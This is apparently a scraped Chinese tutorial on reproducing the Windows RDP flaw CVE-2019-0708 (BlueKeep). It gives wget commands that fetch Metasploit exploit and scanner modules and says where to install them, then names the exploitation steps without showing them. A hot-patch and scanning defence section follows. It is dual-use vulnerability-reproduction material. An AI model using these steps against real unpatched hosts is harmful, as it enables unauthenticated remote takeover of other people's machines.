濮阳杆衣贸易有限公司

主頁 > 知識(shí)庫 > Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題

Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題

熱門標(biāo)簽:靈圖uu電子寵物店地圖標(biāo)注 虛假地圖標(biāo)注 山東企業(yè)外呼系統(tǒng)公司 百度地圖標(biāo)注公司位置要多少錢 承德地圖標(biāo)注公司 地圖標(biāo)注如何改成微信號(hào) 400電話號(hào)碼辦理多少錢 濮陽好的聯(lián)通400電話申請(qǐng) 地圖標(biāo)注黃河的位置

一、漏洞說明

2019年5月15日微軟發(fā)布安全補(bǔ)丁修復(fù)了CVE編號(hào)為CVE-2019-0708的Windows遠(yuǎn)程桌面服務(wù)(RDP)遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞在不需身份認(rèn)證的情況下即可遠(yuǎn)程觸發(fā),危害與影響面極大。

目前,9月7日EXP代碼已被公開發(fā)布至metasploit-framework的Pull requests中,經(jīng)測試已經(jīng)可以遠(yuǎn)程代碼執(zhí)行。

二、漏洞影響版本

Windows 7

Windows server 2008 R2

Windows server 2008

Windows 2003

Windows xp

注:Windows 8和windows10以及之后的版本不受此漏洞影響

三、漏洞環(huán)境搭建

攻擊機(jī):kali 2018.2

靶機(jī):win7 sp1 7061

  

四、漏洞復(fù)現(xiàn)

1、更新msf

apt-get update

apt-get install metasploit-framework

  

2、下載攻擊套件

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3、替換msf中相應(yīng)的文件 

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替換 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替換 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替換 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

4、啟動(dòng)msf,加載文件

  

5、搜索0708,可以看到文件成功加載

  

6、利用漏洞,設(shè)置rhosts、target、payload

  

  

  

  

7、開始執(zhí)行exp,成功獲得shell

  

  

五、漏洞防御

1、熱補(bǔ)丁修復(fù)工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708

注: CVE-2019-0708熱補(bǔ)丁工具”是針對(duì)“Windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞CVE-2019-0708”推出的熱補(bǔ)丁修復(fù)工具,可以針對(duì)不能直接打補(bǔ)丁環(huán)境,提供的臨時(shí)解決漏洞問題的方案?!?/p>

 下載文件進(jìn)行解壓。
2、 使用win+R快捷鍵或開始菜單選擇“運(yùn)行”,輸入cmd。調(diào)起命令行工具。
3、 在命令行工具,執(zhí)行命令到工具所在文件夾
4、 輸入命令對(duì)應(yīng)功能,啟用熱補(bǔ)丁命令:QKShield.exe /enable ;禁用熱補(bǔ)丁命令:QKShield.exe/disable 。
5、 重啟系統(tǒng)后,需要重新運(yùn)行命令行來啟用熱補(bǔ)丁

2、啟用熱補(bǔ)丁

  

3、再次檢測是否存在漏洞,可以看到打完熱補(bǔ)丁之后,不存在漏洞了

  

4、打補(bǔ)丁,漏洞修復(fù)工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708

  

5、點(diǎn)擊”立即修復(fù)”,完成安裝之后,重啟電腦

  

  

6、使用漏洞掃描工具檢測是否存在漏洞,掃描工具下載地址: https://www.qianxin.com/other/CVE-2019-0708

  

總結(jié)

以上所述是小編給大家介紹的Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題,希望對(duì)大家有所幫助,如果大家有任何疑問請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持!
如果你覺得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!

標(biāo)簽:福州 樂山 鷹潭 安康 上海 德宏 泰安 淮安

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題》,本文關(guān)鍵詞  Windows,CVE-2019-0708,遠(yuǎn)程,桌面,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題》相關(guān)的同類信息!
  • 本頁收集關(guān)于Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    沿河| 合山市| 永城市| 合阳县| 松潘县| 山东省| 扬中市| 宁阳县| 西青区| 嵩明县| 凤台县| 和硕县| 明光市| 北辰区| 玛曲县| 友谊县| 渝北区| 拉孜县| 大理市| 临西县| 鸡西市| 樟树市| 邵武市| 汕头市| 桂阳县| 鄯善县| 西乡县| 西充县| 衡东县| 西平县| 德清县| 青田县| 拉萨市| 乐山市| 蒲城县| 通许县| 神木县| 鄂托克旗| 禄丰县| 江华| 体育|